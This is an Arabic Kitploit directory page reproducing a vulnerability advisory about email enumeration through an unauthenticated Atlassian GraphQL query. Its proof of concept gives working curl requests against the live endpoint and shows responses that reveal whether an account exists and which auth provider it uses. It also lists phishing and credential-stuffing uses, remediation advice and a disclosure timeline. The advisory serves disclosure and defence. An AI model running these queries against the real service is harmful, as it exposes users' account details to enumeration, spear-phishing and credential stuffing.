Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-XXXX-atlassian-email-enumeration — CVE-2026-XXXX: Oracle تعداد البريد الإلكتروني في Atlassian GraphQL (CWE-204، CVSS 5.3 متوسطة) | Kitploit
أدوات/GitHubGitHub/wh4l3x/cve-2026-xxxx-atlassian-email-enumeration
الاستخبارات مفتوحة المصدر (OSINT)أدوات التصيدالاستطلاعتحليل الثغرات الأمنيةجمع المعلوماتأمن الويبالهندسة الاجتماعيةجمع البريد الإلكتروني

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
wh4l3x/cve-2026-xxxx-atlassian-email-enumeration

CVE-2026-XXXX-atlassian-email-enumeration

CVE-2026-XXXX: Oracle تعداد البريد الإلكتروني في Atlassian GraphQL (CWE-204، CVSS 5.3 متوسطة)

عرض المستودع
1منذ شهر واحدلم تتم المراجعة بعد

CVE-2026-XXXX: أطلسيان سنترال GraphQL — ثغرة تعداد البريد الإلكتروني

المنتج

بوابة أطلسيان سنترال GraphQL (api.atlassian.com/graphql)

نوع الثغرة

CWE-204: تباين الاستجابة الملحوظ — ثغرة تعداد البريد الإلكتروني

الخطورة

متوسطة — CVSS 5.3 AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

الوصف

استعلام GraphQL loomUnauthenticated_primaryAuthTypeForEmail على بوابة أطلسيان المركزية GraphQL يُرجع استجابات مختلفة اعتمادًا على ما إذا كان عنوان البريد الإلكتروني مسجلاً لدى أطلسيان، مما يسمح بتعداد المستخدمين دون مصادقة.

بريد إلكتروني مسجّل ← يُرجع authType (مثل workos, password, google) وURI إعادة التوجيه بريد إلكتروني غير مسجّل ← يُرجع authType: "none" بدون URI إعادة توجيه

لا تتطلب أي مصادقة. يتضمن اسم الاستعلام كلمة "Unauthenticated" — وهو متعمد كاستعلام عام، لكنه لا ينبغي أن يكشف ما إذا كان عنوان بريد إلكتروني عشوائي مرتبطًا بحساب أطلسيان أم لا.

الإصدارات المتأثرة

  • بوابة أطلسيان سنترال GraphQL (لقطة 37157، إصدار 2026-07-02)
  • نقطة النهاية: https://api.atlassian.com/graphql

إثبات المفهوم

بريد إلكتروني مسجّل (يعيد مزوّد المصادقة):

root@kitploit:~
curl -s "https://api.atlassian.com/graphql" \
  -H "Content-Type: application/json" \
  -d '{"query":"query Test { loomUnauthenticated_primaryAuthTypeForEmail(email: \"[email protected]\") { authType hasActiveMemberships redirectUri } }"}'

الاستجابة:

root@kitploit:~
{
  "data": {
    "loomUnauthenticated_primaryAuthTypeForEmail": {
      "authType": "workos",
      "hasActiveMemberships": false,
      "redirectUri": "https://www.loom.com/api/auth/workos?email=admin%40atlassian.com"
    }
  }
}

بريد إلكتروني غير مسجّل (يعيد none):

root@kitploit:~
curl -s "https://api.atlassian.com/graphql" \
  -H "Content-Type: application/json" \
  -d '{"query":"query Test { loomUnauthenticated_primaryAuthTypeForEmail(email: \"[email protected]\") { authType } }"}'

الاستجابة:

root@kitploit:~
{
  "data": {
    "loomUnauthenticated_primaryAuthTypeForEmail": {
      "authType": "none"
    }
  }
}

كما يسرّب: تعيين البريد الإلكتروني → مزوّد المصادقة

authType: "workos" يؤكد أن البريد الإلكتروني يستخدم WorkOS SSO. authType: "google" أو authType: "password" سيكشف طريقة المصادقة. هذا يتيح التصيد الموجّه بدقة.

الأثر

يمكن لمهاجم دون مصادقة:

  • تعداد حسابات أطلسيان/Loom المسجلة على نطاق واسع
  • ربط رسائل البريد الإلكتروني بمزوّد المصادقة الخاص بها (Google SSO، WorkOS، password)
  • استخدام معلومات مزوّد المصادقة في حملات تصيّد موجّه
  • بناء قوائم بمستخدمي أطلسيان صالحين لاستخدامها في حشو بيانات الاعتماد

السبب الجذري

لا يطبّق استعلام loomUnauthenticated_primaryAuthTypeForEmail أي تحديد لمعدل الطلبات ويعيد معلومات مزوّد المصادقة لأي بريد إلكتروني دون مصادقة. وبينما هذه النقطة مقصود أن تكون دون مصادقة (لتدفق تسجيل Loom)، فإنها تكشف ما إذا كان للبريد الإلكتروني حساب وما هو مزوّد المصادقة الذي يستخدمه.

المعالجة

  1. إضافة تحديد لمعدل الطلبات لمنع التعداد الجماعي
  2. إرجاع استجابة موحّدة لكل من الرسائل المسجلة وغير المسجلة
  3. أو: طلب CAPTCHA/nonce قبل الاستعلام عن حالة البريد الإلكتروني

ما ليس هذا الأمر

بعد اختبارات معمّقة، تم إبطال هذه الادعاءات:

  • ❌ لا يوجد JWT بصلاحيات (الرموز تحمل aaid: "unidentified")
  • ❌ لا يوجد تنفيذ لعمليات تحوير إدارية (كلها تفشل بـ ValidationError)
  • ❌ لا يوجد تجاوز للمصادقة (البوابة تحدّد المتصل بشكل صحيح بأنه unidentified)
  • ❌ لا يوجد تسريب بيانات يتجاوز تعيين البريد الإلكتروني/مزوّد المصادقة

الجدول الزمني

  • 2026-06-30: الاكتشاف
  • 2026-06-30: الإبلاغ إلى [email protected]
  • 2026-07-02: تصحيح التقييم — تخفيض الخطورة من حرجة (9.8) إلى متوسطة (5.3)

اكتشفه

Wh4l3X

تنزيل الأداة